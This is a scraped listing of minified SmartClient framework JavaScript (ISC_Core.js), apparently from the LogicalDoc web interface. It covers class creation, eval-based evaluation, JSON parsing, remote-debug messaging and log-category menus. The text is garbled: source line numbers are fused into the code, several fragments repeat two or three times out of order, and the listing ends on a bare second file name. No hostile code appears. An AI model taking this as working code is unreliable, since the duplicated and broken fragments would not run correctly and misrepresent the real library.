File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_Core.jsCode:

1958if(_2)isc.Class.fireCallback(_2,"categories",[_3]);return _3},isc.A.getLogCategoryData=function isc_DebugTarget_getLogCategoryData(_1,_2){var _3=(_1?isc.Log.getLogPriorities(_1,true):null),_4=this.getLogCategories(_1),_5=isc.Log;var _6=[],_7;for(var i=0;i<_4.length;i++){var _9=_4[i];if(_1){if(_9==isc.Log._allCategories)continue;else if(_9==isc.Log.$fs){_7=window[_1].getDefaultLogPriority();continue}}1959var _10=_5.getPriority(_9,_1);var _11=this.DEFAULT_CATEGORIES.findIndex("name",_9);var _12;if(_11!=-1)_12=this.DEFAULT_CATEGORIES[_11].description;_6.add({category:_9,description:_12,priority:_10||_5.defaultPriority,custom:_3&&_3[_9]!=null})}1960_6.add({category:"[default]",priority:(_7||_5.defaultPriority),custom:(_7?true:false)});this.fireCallback(_2,"categoryData",[_6])},isc.A.generateLogMenuItems=function isc_DebugTarget_generateLogMenuItems(_1,_2,_3){var _4=this.getLogCategories(),_5=[],_6=[];var _7=Math.min(_4.length,_2);for(var i=0;i<_7;i++){var _9=_4[i];var _10=isc.Log.getPriority(_9,_1);if(_10==null)_10=isc.Log.getDefaultPriority();_6.add({title:_9,selectedLevel:_10,category:_9,addPrioritiesSubmenu:true,enableIf:"menu.allCategoriesOverride() == null"})}1961_6.add({isSeparator:true});_6.add({title:"[default]",category:"$fs",addPrioritiesSubmenu:true,selectedLevel:isc.Log.getDefaultPriority(_1),enableIf:"menu.allCategoriesOverride() == null"})1962_6.add({title:"More...",click:"menu.setCustomLogPriorities()"});_5=_6.duplicate();_6=_1!=null?_5:_6;for(var i=0;i<_6.length;i++){var _11=_6[i],_9=_11.category;if(_9){var _12=isc.Log.getPriority(_9,_1),_13=(_12>isc.Log.WARN?"color:blue;":null);if(_13!=_11.cssText){_11.cssText=_13}}}1963this.fireCallback(_3,"menuItems",[_6])},isc.A.getGlobalLogCookie=function isc_DebugTarget_getGlobalLogCookie(_1){var _2=isc.LogViewer.getGlobalLogCookie();if(_2==null)_2={};_2.priorityDefaults=isc.Log.getLogPriorities();_2.defaultPriority=isc.Log.defaultPriority;if(_1)this.fireCallback(_1,"globalLogCookie",[_2]);return _2},isc.A.set=function isc_DebugTarget_set(_1,_2,_3){var _1=isc.Class.globalEvalWithCapture(_1+"="+_2);if(_3)this.fireCallback(_3,"lValue",[eval(_1)])},isc.A.get=function isc_DebugTarget_get(_1,_2){this.fireCallback(_2,"value",


[eval(_1)])});isc.B._maxIndex=isc.C+30;isc.defineClass("DebugFocus").addClassProperties({hideTimeout:2000,opacityMax:75,opacityMin:50,oscillationFrequency:2000,showFocus:function(){if(this.$ke&&this.$ke.isVisible()){this.clearHideTimer();this.setHideTimer();return}1964if(!this.$ke){this.$ke=isc.Canvas.create({width:"100%",height:"100%",overflow:"hidden",backgroundColor:"#4169E1",hideUsingDisplayNone:true})}1965var _1=this.$ke;_1.setOpacity(this.opacityMin);_1.show();_1.bringToFront();this.setHideTimer();this.startFadeInAnimation()},clearFocus:function(){this.clearHideTimer();this.hideFocus()},startFadeOutAnimation:function(){this.$ke.cancelAnimation(this.fadeAnimationID);this.fadeAnimationID=this.$ke.animateFade(this.opacityMin,"isc.DebugFocus.startFadeInAnimation()",this.oscillationFrequency/2,"smoothStart")},startFadeInAnimation:function(){this.$ke.cancelAnimation(this.fadeAnimationID);this.fadeAnimationID=this.$ke.animateFade(this.opacityMax,"isc.DebugFocus.startFadeOutAnimation()",this.oscillationFrequency/2,"smoothStart")},hideFocus:function(){if(this.$ke!=null){this.$ke.cancelAnimation(this.fadeAnimationID);this.$ke.hide()}},clearHideTimer:function(){if(this.$144p!=null){isc.Timer.clearTimeout(this.$144p);delete this.$144p}},setHideTimer:function(){this.$144p=isc.Timer.setTimeout("isc.DebugFocus.hideFocus()",this.hideTimeout)}});isc.defineClass("RemoteDebug").addClassProperties({isEnabled:false,modulesDir:"system/development/",getUniqueChannelName:function(){return navigator.userAgent},conditionallyEnable:function(){this.logDebug("conditionally enabling debug");if(window.isc_remoteDebug&&isc.Browser.isMobile){this.enable()}else if(isc.params["isc_remoteDebug"]=="true"){this.enable()}},requiredModules:["RealtimeMessaging"],loadRequiredModules:function(_1){var _2=this;isc.FileLoader.ensureLoaded(function(){var _3=isc.FileLoader.modulesDir;isc.FileLoader.modulesDir=_2.modulesDir1966isc.FileLoader.loadModules(_2.requiredModules,function(){isc.FileLoader.modulesDir=_3;_2.fireCallback(_1)});isc.FileLoader.modulesDir=_3})},enable:function(_1){if(this.isEnabled){_2.fireCallback(_1)}1967if(!isc.hasOptionalModules("SCServer")){alert("Remote debugging requires a Pro or better license.");return}1968if(!isc.Log.logViewer)isc.Log.logViewer=isc.LogViewer.create();var _2=this;this.loadRequiredModules(function(){isc.debugTarget=isc.DebugTarget.create({});isc.debugTarget.start(function(){isc.debugTarget.sendTargetAvailableNotify();_2.isEnabled=true;_2.logInfo("Remote debug enabled");_2.fireCallback(_1)})})},enableLocal:function(_1){if(isc.debugTarget){isc.debugTarget.debugDisable()}


212return _14},isc.A.createRaw=function isc_c_Class_createRaw(){if(this.$1226&&!isc.isVisualBuilderSDK){var _1="Attempt to create "+this.getClassName()+". This class requires the Dashboards & Tools framework which is only included with Enterprise licenses.";isc.logWarn(_1);if(!this.$1228){try{isc.warn(_1);this.$1228=true}catch(e){}}213return null}214if(!this.initialized())this.init();var _2=new this.$b4.$b5();_2.ns=this.ns;return _2},isc.A.init=function isc_c_Class_init(){var _1=this.getSuperClass();if(_1!=null&&!_1.initialized())_1.init();var _2=this.$cg;if(_2!=null){this.$cg=null;var _3=isc.captureDefaults;if(_3)isc.captureDefaults=false;_2.map(function(_4){isc.eval(_4)});if(_3)isc.captureDefaults=true}215if(this.autoDupMethods){isc.Class.duplicateMethods(this,this.autoDupMethods)}216this.$cj[this.Class]=true},isc.A.modifyFrameworkStart=function isc_c_Class_modifyFrameworkStart(){isc.definingFramework=true},isc.A.modifyFrameworkDone=function isc_c_Class_modifyFrameworkDone(){isc.definingFramework=false},isc.A.duplicateMethods=function isc_c_Class_duplicateMethods(_1,_2){if(_1.Class&&this.dontDup[_1.Class])return;for(var i=0;i<_2.length;i++){var _4=_2[i];this.duplicateMethod(_4,_1)}},isc.A.duplicateMethod=function(methodName,target){if(!target)target=this;var method=target[methodName];if(method==null)return;if(method.$761){while(method.$761)method=method.$761}217var dup;if(method.toSource==null){dup=eval("dup = "+method.toString())}else{dup=eval(method.toSource())}218if(!method.$dx)isc.Func.getName(method,true);dup.$dx=method.$dx+"[d]";dup.$761=method;target[methodName]=dup;return dup},isc.A.$1361=function isc_c_Class__createUnsupportedMethodImpl(_1,_2){var _3={};var _4=function(){var _5=this.getClassName();if(_3[_5])return;var _6=_1.replace(/(\$?)\$(class|method)/g,function(_8,_9,_10,_11,_1){if(_9==="$")return"$"+_10;else if(_10==="class")return _5;else if(_10==="method")return _2});this.logWarn(_6);_3[_5]=true};_4.$1362=true;var _7=this.


$b4[_2];if(isc.isA.Function(_7)){_4.$123y=isc.Func.getArgString(_7)}219return _4},isc.A.markUnsupportedMethods=function isc_c_Class_markUnsupportedMethods(_1,_2){if(_1==null)_1="$class does not support the $method() method.";for(var i=0;i<_2.length;++i){var _4=_2[i];this.$b4[_4]=this.$1361(_1,_4)}},isc.A.isMethodSupported=function isc_c_Class_isMethodSupported(_1){var _2=this.$b4[_1];return _2!=null&&!_2.$1362},isc.A.isMethodUnsupported=function isc_c_Class_isMethodUnsupported(_1){return!this.isMethodSupported(_1)},isc.A.initialized=function isc_c_Class_initialized(){return this.$cj[this.Class]},isc.A.getClassName=function isc_c_Class_getClassName(){return this.Class},isc.A.getScClassName=function isc_c_Class_getScClassName(){return this.isFrameworkClass?this.Class:this.$75y},isc.A.compareScClassName=function isc_c_Class_compareScClassName(_1,_2){return _1.getScClassName()==_2},isc.A.getSuperClass=function isc_c_Class_getSuperClass(){return this.$b8},isc.A.getPrototype=function isc_c_Class_getPrototype(){return this.$b4},isc.A.addMethods=function isc_c_Class_addMethods(){if(this.$a5){this.logWarn("Use addInterfaceMethods() to add methods to interface "+this)}220for(var i=0;i<arguments.length;i++)221isc.addMethods(this.$b4,arguments[i]);return this.$b4},isc.A.addInterfaceMethods=function isc_c_Class_addInterfaceMethods(){for(var i=0;i<arguments.length;i++)222isc.addMethods(this.$b4,arguments[i])},isc.A.addInterfaceProperties=function isc_c_Class_addInterfaceProperties(){isc.addPropertyList(this.$b4,arguments,true)},isc.A.registerStringMethods=function isc_c_Class_registerStringMethods(_1,_2){var _3=this._stringMethodRegistry;if(!this.isOverridden("_stringMethodRegistry")){var _4={},_5=_4.$cq=(_3.$cq?_3.$cq.duplicate():[]);for(var i=0;i<_5.length;i++){_4[_5[i]]=_3[_5[i]]}


212return _14},isc.A.createRaw=function isc_c_Class_createRaw(){if(this.$1226&&!isc.isVisualBuilderSDK){var _1="Attempt to create "+this.getClassName()+". This class requires the Dashboards & Tools framework which is only included with Enterprise licenses.";isc.logWarn(_1);if(!this.$1228){try{isc.warn(_1);this.$1228=true}catch(e){}}213return null}214if(!this.initialized())this.init();var _2=new this.$b4.$b5();_2.ns=this.ns;return _2},isc.A.init=function isc_c_Class_init(){var _1=this.getSuperClass();if(_1!=null&&!_1.initialized())_1.init();var _2=this.$cg;if(_2!=null){this.$cg=null;var _3=isc.captureDefaults;if(_3)isc.captureDefaults=false;_2.map(function(_4){isc.eval(_4)});if(_3)isc.captureDefaults=true}215if(this.autoDupMethods){isc.Class.duplicateMethods(this,this.autoDupMethods)}216this.$cj[this.Class]=true},isc.A.modifyFrameworkStart=function isc_c_Class_modifyFrameworkStart(){isc.definingFramework=true},isc.A.modifyFrameworkDone=function isc_c_Class_modifyFrameworkDone(){isc.definingFramework=false},isc.A.duplicateMethods=function isc_c_Class_duplicateMethods(_1,_2){if(_1.Class&&this.dontDup[_1.Class])return;for(var i=0;i<_2.length;i++){var _4=_2[i];this.duplicateMethod(_4,_1)}},isc.A.duplicateMethod=function(methodName,target){if(!target)target=this;var method=target[methodName];if(method==null)return;if(method.$761){while(method.$761)method=method.$761}217var dup;if(method.toSource==null){dup=eval("dup = "+method.toString())}else{dup=eval(method.toSource())}218if(!method.$dx)isc.Func.getName(method,true);dup.$dx=method.$dx+"[d]";dup.$761=method;target[methodName]=dup;return dup},isc.A.$1361=function isc_c_Class__createUnsupportedMethodImpl(_1,_2){var _3={};var _4=function(){var _5=this.getClassName();if(_3[_5])return;var _6=_1.replace(/(\$?)\$(class|method)/g,function(_8,_9,_10,_11,_1){if(_9==="$")return"$"+_10;else if(_10==="class")return _5;else if(_10==="method")return _2});this.logWarn(_6);_3[_5]=true};_4.$1362=true;var _7=this.$b4[_2];if(isc.isA.Function(_7)){_4.$123y=isc.Func.getArgString(_7)}219return _4},isc.A.markUnsupportedMethods=function isc_c_Class_markUnsupportedMethods(_1,_2){if(_1==null)_1="$class does not support the $method() method.";for(var i=0;i<_2.length;++i){var _4=_2[i];this.$b4[_4]=this.$1361(_1,_4)}},isc.A.isMethodSupported=function isc_c_Class_isMethodSupported(_1){var _2=this.$b4[_1];return _2!=null&&!_2.$1362},isc.A.isMethodUnsupported=function isc_c_Class_isMethodUnsupported(_1){return!this.isMethodSupported(_1)},isc.A.initialized=function isc_c_Class_initialized(){return this.$cj[this.Class]},isc.A.getClassName=function isc_c_Class_getClassName()


{return this.Class},isc.A.getScClassName=function isc_c_Class_getScClassName(){return this.isFrameworkClass?this.Class:this.$75y},isc.A.compareScClassName=function isc_c_Class_compareScClassName(_1,_2){return _1.getScClassName()==_2},isc.A.getSuperClass=function isc_c_Class_getSuperClass(){return this.$b8},isc.A.getPrototype=function isc_c_Class_getPrototype(){return this.$b4},isc.A.addMethods=function isc_c_Class_addMethods(){if(this.$a5){this.logWarn("Use addInterfaceMethods() to add methods to interface "+this)}220for(var i=0;i<arguments.length;i++)221isc.addMethods(this.$b4,arguments[i]);return this.$b4},isc.A.addInterfaceMethods=function isc_c_Class_addInterfaceMethods(){for(var i=0;i<arguments.length;i++)222isc.addMethods(this.$b4,arguments[i])},isc.A.addInterfaceProperties=function isc_c_Class_addInterfaceProperties(){isc.addPropertyList(this.$b4,arguments,true)},isc.A.registerStringMethods=function isc_c_Class_registerStringMethods(_1,_2){var _3=this._stringMethodRegistry;if(!this.isOverridden("_stringMethodRegistry")){var _4={},_5=_4.$cq=(_3.$cq?_3.$cq.duplicate():[]);for(var i=0;i<_5.length;i++){_4[_5[i]]=_3[_5[i]]}


1958if(_2)isc.Class.fireCallback(_2,"categories",[_3]);return _3},isc.A.getLogCategoryData=function isc_DebugTarget_getLogCategoryData(_1,_2){var _3=(_1?isc.Log.getLogPriorities(_1,true):null),_4=this.getLogCategories(_1),_5=isc.Log;var _6=[],_7;for(var i=0;i<_4.length;i++){var _9=_4[i];if(_1){if(_9==isc.Log._allCategories)continue;else if(_9==isc.Log.$fs){_7=window[_1].getDefaultLogPriority();continue}}1959var _10=_5.getPriority(_9,_1);var _11=this.DEFAULT_CATEGORIES.findIndex("name",_9);var _12;if(_11!=-1)_12=this.DEFAULT_CATEGORIES[_11].description;_6.add({category:_9,description:_12,priority:_10||_5.defaultPriority,custom:_3&&_3[_9]!=null})}1960_6.add({category:"[default]",priority:(_7||_5.defaultPriority),custom:(_7?true:false)});this.fireCallback(_2,"categoryData",[_6])},isc.A.generateLogMenuItems=function isc_DebugTarget_generateLogMenuItems(_1,_2,_3){var _4=this.getLogCategories(),_5=[],_6=[];var _7=Math.min(_4.length,_2);for(var i=0;i<_7;i++){var _9=_4[i];var _10=isc.Log.getPriority(_9,_1);if(_10==null)_10=isc.Log.getDefaultPriority();_6.add({title:_9,selectedLevel:_10,category:_9,addPrioritiesSubmenu:true,enableIf:"menu.allCategoriesOverride() == null"})}1961_6.add({isSeparator:true});_6.add({title:"[default]",category:"$fs",addPrioritiesSubmenu:true,selectedLevel:isc.Log.getDefaultPriority(_1),enableIf:"menu.allCategoriesOverride() == null"})1962_6.add({title:"More...",click:"menu.setCustomLogPriorities()"});_5=_6.duplicate();_6=_1!=null?_5:_6;for(var i=0;i<_6.length;i++){var _11=_6[i],_9=_11.category;if(_9){var _12=isc.Log.getPriority(_9,_1),_13=(_12>isc.Log.WARN?"color:blue;":null);if(_13!=_11.cssText){_11.cssText=_13}}}1963this.fireCallback(_3,"menuItems",[_6])},isc.A.getGlobalLogCookie=function isc_DebugTarget_getGlobalLogCookie(_1){var _2=isc.LogViewer.getGlobalLogCookie();if(_2==null)_2={};_2.priorityDefaults=isc.Log.getLogPriorities();_2.defaultPriority=isc.Log.defaultPriority;if(_1)this.fireCallback(_1,"globalLogCookie",[_2]);return _2},isc.A.set=function isc_DebugTarget_set(_1,_2,_3){var _1=isc.Class.globalEvalWithCapture(_1+"="+_2);if(_3)this.fireCallback(_3,"lValue",[eval(_1)])},isc.A.get=function isc_DebugTarget_get(_1,_2){this.fireCallback(_2,"value",[eval(_1)])});isc.B._maxIndex=isc.C+30;isc.defineClass("DebugFocus").addClassProperties({hideTimeout:2000,opacityMax:75,opacityMin:50,oscillationFrequency:2000,showFocus:function(){if(this.$ke&&this.$ke.isVisible()){this.clearHideTimer();this.setHideTimer();return}1964if(!this.$ke){this.$ke=isc.Canvas.create({width:"100%",height:"100%",overflow:"hidden",backgroundColor:"#4169E1",hideUsingDisplayNone:true})}1965var _1=this.$ke;_1.setOpacity(this.opacityMin);_1.show();_1.bringToFront();this.setHideTimer();this.startFadeInAnimation()},clearFocus:function(){this.clearHideTimer();this.hideFocus()},startFadeOutAnimation:function(){this.$ke.cancelAnimation(this.fadeAnimationID);this.fadeAnimationID=this.$ke.animateFade(this.opacityMin,"isc.DebugFocus.startFadeInAnimation()",this.oscillationFrequency/2,"smoothStart")},startFadeInAnimation:function(){this.$ke.cancelAnimation(this.fadeAnimationID);this.fadeAnimationID=this.$ke.animateFade(this.opacityMax,"isc.DebugFocus.startFadeOutAnimation()",this.oscillationFrequency/2,"smoothStart")},hideFocus:function(){if(this.$ke!=null){this.$ke.cancelAnimation(this.fadeAnimationID);this.$ke.hide()}},clearHideTimer:function(){if(this.$144p!=null){isc.Timer.clearTimeout(this.$144p);delete this.$144p}},setHideTimer:function(){this.


$144p=isc.Timer.setTimeout("isc.DebugFocus.hideFocus()",this.hideTimeout)}});isc.defineClass("RemoteDebug").addClassProperties({isEnabled:false,modulesDir:"system/development/",getUniqueChannelName:function(){return navigator.userAgent},conditionallyEnable:function(){this.logDebug("conditionally enabling debug");if(window.isc_remoteDebug&&isc.Browser.isMobile){this.enable()}else if(isc.params["isc_remoteDebug"]=="true"){this.enable()}},requiredModules:["RealtimeMessaging"],loadRequiredModules:function(_1){var _2=this;isc.FileLoader.ensureLoaded(function(){var _3=isc.FileLoader.modulesDir;isc.FileLoader.modulesDir=_2.modulesDir1966isc.FileLoader.loadModules(_2.requiredModules,function(){isc.FileLoader.modulesDir=_3;_2.fireCallback(_1)});isc.FileLoader.modulesDir=_3})},enable:function(_1){if(this.isEnabled){_2.fireCallback(_1)}1967if(!isc.hasOptionalModules("SCServer")){alert("Remote debugging requires a Pro or better license.");return}1968if(!isc.Log.logViewer)isc.Log.logViewer=isc.LogViewer.create();var _2=this;this.loadRequiredModules(function(){isc.debugTarget=isc.DebugTarget.create({});isc.debugTarget.start(function(){isc.debugTarget.sendTargetAvailableNotify();_2.isEnabled=true;_2.logInfo("Remote debug enabled");_2.fireCallback(_1)})})},enableLocal:function(_1){if(isc.debugTarget){isc.debugTarget.debugDisable()}


232if(isc.Canvas&&isc.isA.Canvas(_2)){this.logWarn("Default value for property '"+_1+"' is set to a live Canvas (with ID '"+_2.getID()+"') at the Class or AutoChild-defaults level. SmartClient cannot clone a live widget, so each instance of this class may end up pointing to the same live component. To avoid unpredictable behavior and suppress this warning, use the AutoChild subsystem to set up re-usable default properties for sub-components.");return _2}233var _5=isc.shallowClone(_2);var _6=this.$769;if(_6.$77a!=null&&_6.$77a[_1]!=null&&_5!=null)234{for(var i=0;i<_6.$77a[_1].length;i++){var _7=_6.$77a[_1][i];if(_5[_7]!=null){_5[_7]=isc.shallowClone(_5[_7])}}}235return _5},isc.A.evaluate=function isc_c_Class_evaluate(_1,_2,_3,_4,_5,_6){if(_5){return this.parseStrictJSON(_1,_6)}236if(!isc.$611)isc.$611=0;isc.$611++;var _7;if(_4&&isc.Browser.isIE&&!_3&&isc.Page.isLoaded()){_7=this.evalInIFrame(_1,_2)}else{if(_2){with(_2){if(_3)_7=window.eval(_1)237else _7=eval(_1)}}else{if(_3)_7=window.eval(_1)238else _7=eval(_1)}}239if(isc.$611!=null)isc.$611--;if(isc.$611==0)delete isc.$611;return _7},isc.A.parseStrictJSON=function isc_c_Class_parseStrictJSON(_1,_2,_3,_4){var _5;if(_3||_4||!isc.Browser.$1691){_5=this.getJSONParseFunc()}else{_5=window.JSON.parse}240return _5(_1,_2,_4)},isc.A.getJSONParseFunc=function isc_c_Class_getJSONParseFunc(){if(this.$105i)return this.$105i;this.logInfo("No native JSON.parse() available in this browser. Creating strict JSON parsing function.","jsonEval");var _1=this,_2=this.$105h;this.$105y=function(_13,_14,_15,_16,_10){var _3;var k,v,_6=_13[_14];if(_6&&typeof _6==='object'&&_6!=window&&_6!=window.isc&&!isc.isA.Class(_6)&&!isc.isAn.Instance(_6))241{var _7=false;var _8=isc.JSONEncoder.$zl(_16,_6);if(_8!=null&&_10.contains(_8)){var _9=_10.substring(_8.length,_8.length+1);if(_9=="."||_9=="["||_9=="]"){_7=true}}242if(!_7){isc.JSONEncoder.$zm(_16,_6,_10);for(k in _6){if(Object.prototype.hasOwnProperty.call(_6,k)){var _10=isc.JSONEncoder.$zp(_10,k);v=_1.$105y(_6,k,_15,_16,_10);if(v!==_3){_6[k]=v}else{delete _6[k]}}}}}


233var _5=isc.shallowClone(_2);var _6=this.$769;if(_6.$77a!=null&&_6.$77a[_1]!=null&&_5!=null)234{for(var i=0;i<_6.$77a[_1].length;i++){var _7=_6.$77a[_1][i];if(_5[_7]!=null){_5[_7]=isc.shallowClone(_5[_7])}}}235return _5},isc.A.evaluate=function isc_c_Class_evaluate(_1,_2,_3,_4,_5,_6){if(_5){return this.parseStrictJSON(_1,_6)}236if(!isc.$611)isc.$611=0;isc.$611++;var _7;if(_4&&isc.Browser.isIE&&!_3&&isc.Page.isLoaded()){_7=this.evalInIFrame(_1,_2)}else{if(_2){with(_2){if(_3)_7=window.eval(_1)237else _7=eval(_1)}}else{if(_3)_7=window.eval(_1)


238else _7=eval(_1)}}239if(isc.$611!=null)isc.$611--;if(isc.$611==0)delete isc.$611;return _7},isc.A.parseStrictJSON=function isc_c_Class_parseStrictJSON(_1,_2,_3,_4){var _5;if(_3||_4||!isc.Browser.$1691){_5=this.getJSONParseFunc()}else{_5=window.JSON.parse}240return _5(_1,_2,_4)},isc.A.getJSONParseFunc=function isc_c_Class_getJSONParseFunc(){if(this.$105i)return this.$105i;this.logInfo("No native JSON.parse() available in this browser. Creating strict JSON parsing function.","jsonEval");var _1=this,_2=this.$105h;this.$105y=function(_13,_14,_15,_16,_10){var _3;var k,v,_6=_13[_14];if(_6&&typeof _6==='object'&&_6!=window&&_6!=window.isc&&!isc.isA.Class(_6)&&!isc.isAn.Instance(_6))241{var _7=false;var _8=isc.JSONEncoder.$zl(_16,_6);if(_8!=null&&_10.contains(_8)){var _9=_10.substring(_8.length,_8.length+1);if(_9=="."||_9=="["||_9=="]"){_7=true}}242if(!_7){isc.JSONEncoder.$zm(_16,_6,_10);for(k in _6){if(Object.prototype.hasOwnProperty.call(_6,k)){var _10=isc.JSONEncoder.$zp(_10,k);v=_1.$105y(_6,k,_15,_16,_10);if(v!==_3){_6[k]=v}else{delete _6[k]}}}}}243return _15.call(_13,_14,_6)};this.$105i=function(_13,_14,_15){var j;var _12=false;if(_15==null)_15=isc.Class.$105j;if(!_15){_13=String(_13);_2.lastIndex=0;if(_2.test(_13)){_13=_13.replace(_2,function(_16){return'\\u'+('0000'+_16.charCodeAt(0).toString(16)).slice(-4)})}


1919this.sockets=[];this.socket=isc.ClassFactory.getClass(this.socketConstructor,true).create({receiveChannel:this.receiveChannel,packetReceived:function(_6,_7,_8){_2.handlePacket(_6,_7,_8)}},this.socketDefaults,this.socketProperties);this.sockets.add(this.socket);if(this.discoverableOnChannel){this.discoverySocket=isc.ClassFactory.getClass(this.socketConstructor,true).create({receiveChannel:this.discoverableOnChannel,packetReceived:function(_6,_7,_8){_2.handlePacket(_6,_7,_8)}},this.socketDefaults,this.socketProperties);this.sockets.add(this.discoverySocket)}1920var _2=this;var _3=0;for(var i=0;i<this.sockets.length;i++){var _5=this.sockets[i];_5.bind(function(){if(++_3==_2.sockets.length){_2.isAvailable=true;if(_1)_2.fireCallback(_1)}})}},stop:function(_1){this.isAvailable=false;if(!this.sockets){this.fireCallback(_1);return}1921var _2=this;var _3=this.sockets.length;for(var i=0;this.sockets&&i<this.sockets.length;i++){var _5=this.sockets[i];_5.close(function(){if(--_3==0){delete _2.sockets;if(_1)_2.fireCallback(_1)}})}},discover:function(_1){this.logDebug("discover invoked - callback: "+(_1?_1.toString():"null"));if(_1)this.fireCallback(_1,"serverProperties",[this.getServerProperties()])},ping:function(_1){this.logDebug("ping");if(_1)this.fireCallback(_1)},connect:function(_1){this.logDebug("connect");if(_1)this.fireCallback(_1)},disconnect:function(_1){this.logDebug("disconnect");if(_1)this.fireCallback(_1)},call:function(_1,_2,_3){var _4=this;var _5;var _6={};if(isc.isAn.Object(_1)){_6=_1;_5=_6.targetName;_1=_6.methodName;_2=_6.args;_3=_6.callback}1922if(!_5){var _7=_1.lastIndexOf(".");if(_7!=-1){_5=_1.substring(0,_7);_1=_1.substring(_7+1)}}1923if(_5&&!this.allowUnrestrictedCallTarget){this.logError("Attempt to call: "+_5+"."+_1+"() REJECTED - to enable, set allowUnrestrictedCallTarget on your "+this.getClassName());return}1924var _8=_5?eval(_5):this;if(!(this.visibleMethods.contains("*")||this.allowUnrestrictedCallTarget)){if(!(this.visibleMethods.contains(_1)||isc.MessagingDMI.builtinMethods.contains(_1))){this.logError("Attempt to call non-visible method: "+_1+" DENIED. To allow this action, declare this method in your "+this.getClassName()+".visibleMethods list.");return}}1925var _9=_8[_1];if(!_9){this.logError("Unable to find method named '"+_1+"' on class: "+this.getClassName());return}1926if(!_2)_2=[];if(!isc.isAn.Array(_2)){this.logError("Expected Array as second arg or props.args in "+this.getClassName()+".call(), but got:"+isc.echoFull(_2));return}1927if(_8==this){_9.apply(this,_2.concat([function(_10){if(_3)_4.fireCallback(_3,"retVal",[_10])}]))}else{var _10=_9.apply(_8,_2);if(_3)_4.fireCallback(_3,"retVal",[_10])}}});isc.defineClass("DebugTarget","MessagingDMIServer");isc.A=isc.DebugTarget.getPrototype();isc.B=isc._allFuncs;isc.C=isc.B._maxIndex;isc.D=isc._funcClasses;isc.D[isc.C]=isc.A.Class;isc.A.allowUnrestrictedCallTarget=true;isc.A.discoverableOnChannel="isc_DebugTarget";isc.A.socketDefaults={doNotTrackRPC:true,isRemoteDebug:true};isc.A.discoverySocketDefaults={doNotTrackRPC:true,isRemoteDebug:true};isc.A.$f8="count";isc.A.DEFAULT_CATEGORIES=[{name:"layout",description:"Logs from Layout and Stack about members and layout policy."},{name:"sizing",description:"Reporting drawn sizes"},{name:"scrolling",description:"Detecting the need for scrolling and custom scrollbars"},{name:"animation",description:"Animation logs"},{name:"RPCManager",description:"RPC and DataSource requests and responses"},{name:"RPCManagerResponse",description:"Enable logging of full length RPC responses (can be slow)"},{name:"xmlComm",description:"Inbound and outbound XML messages"},


{name:"xmlSelect",description:"XPath expressions and their results"},{name:"xmlBinding",description:"DataSource and WebService XML request/response handling"},{name:"xmlToJS",description:"XML to JavaScript translation in databinding"},{name:"ResultSet",description:"Load on demand and cache update management for ListGrids"},{name:"ResultTree",description:"Load on demand for TreeGrids"},{name:"FileLoader",description:"Background download and caching of files"},{name:"fetchTrace",description:"Shows a stack trace for all fetches initiated through a ResultSet"},{name:"dragDrop",description:"Drag and drop related logs"},{name:"EventHandler",description:"Mouse and keyboard events, bubbling, cancellation"},{name:"visualState",description:"Visual state transitions for buttons, bars, and other stateful widgets"},{name:"RpcTabTiming",description:"Show detailed timing data for RPC/DSRequests in the RPC tab"},{name:"gridEdit",description:"Inline editing in grids"},{name:"Page",description:"Page-wide events"},{name:"loadTime",description:"ISC load / parse time"},{name:"redraws",description:"Logging of redraw()s and reasons for them"},{name:"redrawTrace",description:"Logs a stack trace for every redraw when both 'redraws' and 'redrawTrace' are set to debug priority"},{name:"clears",description:"Logs all clear()s"},{name:"destroys",description:"Logs all destroy()s"},{name:"draws",description:"All component draws"},{name:"resize",description:"Resizes of drawn components"},{name:"testReplay",description:"Details of why Selenium commands are failing during playback"},{name:"DynamicForm"},{name:"ListGrid"},{name:"TreeGrid"},{name:"CubeGrid"},{name:"deprecated",description:"Notify when deprecated attributes are used"}];isc.B.push(isc.A.getGUID=function isc_DebugTarget_getGUID(_1){if(!this.GUID){var _2=isc.LogViewer.getGlobalLogCookieValue("isc_pageGUID");var _3=isc.LogViewer.getGlobalLogCookieValue("isc_pageURL");if(!_2||_3!=location.href){var _4=this;this.Super("getGUID",[function(_2){_4.GUID=_2;isc.LogViewer.setGlobalLogCookieValue("isc_pageURL",location.href);isc.LogViewer.setGlobalLogCookieValue("isc_pageGUID",_4.GUID);_4.fireCallback(_1,"GUID",[_4.GUID])}],arguments);return}else{this.GUID=_2}}1928this.fireCallback(_1,"GUID",[this.GUID])},isc.A.sendTargetAvailableNotify=function isc_DebugTarget_sendTargetAvailableNotify(){this.socket.send("isc_DebugMaster",{methodName:"targetAvailable",args:[this.getServerProperties()]})},isc.A.getServerProperties=function isc_DebugTarget_getServerProperties(){var _1="Desktop";if(isc.Browser.isTablet)_1="Tablet";else if(isc.Browser.isHandset)_1="Handset";return isc.addProperties(this.Super("getServerProperties",arguments),{userAgent:navigator.userAgent,documentTitle:document.title,URL:location.href,formFactor:_1,browserVersion:isc.Browser.version,browserMinorVersion:isc.Browser.minorVersion})},isc.A.pushRPCUpdate=function isc_DebugTarget_pushRPCUpdate(_1){if(!isc.debugMaster)return;var _2={cancelled:_1.cancelled,receiveTime:_1.receiveTime,URL:_1.URL,transactionNum:_1.transactionNum,serializedCommResults:_1.serializedCommResults,serializedCommResultsAreFormatted:_1.serializedCommResultsAreFormatted,transport:_1.transport};var _3=[];for(var i=0;i<_1.operations.length;i++){var _5=_1.operations[i];var _6=_1.responses[i];_3[i]=this.rpcToRecord(_1,_5,_6);if(_1.operations.length>1)_3[i]._queueIndex=i}1929_2.rpcs=_3;isc.debugMaster.call("isc.RPCTracker.updateTransactionRecord",[_2]);_1.pushedToDebugMaster=true},isc.A.rpcToRecord=function isc_DebugTarget_rpcToRecord(_1,_2,_3){var _4=_2._dsRequest||_2.$374;var _5="RPCRequest";if(_4!=null)_5="DSRequest";else if(_2.data&&_2.data.is_ISC_RPC_DMI)_5="RPC DMI";else if(_2.wsOperation)_5="WSRequest";var _6;if(_2.operationType){_6=_2.operationType;if(_2.operationId){_6+="<"+_2.operationId+">"}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_DataBinding.jsCode:

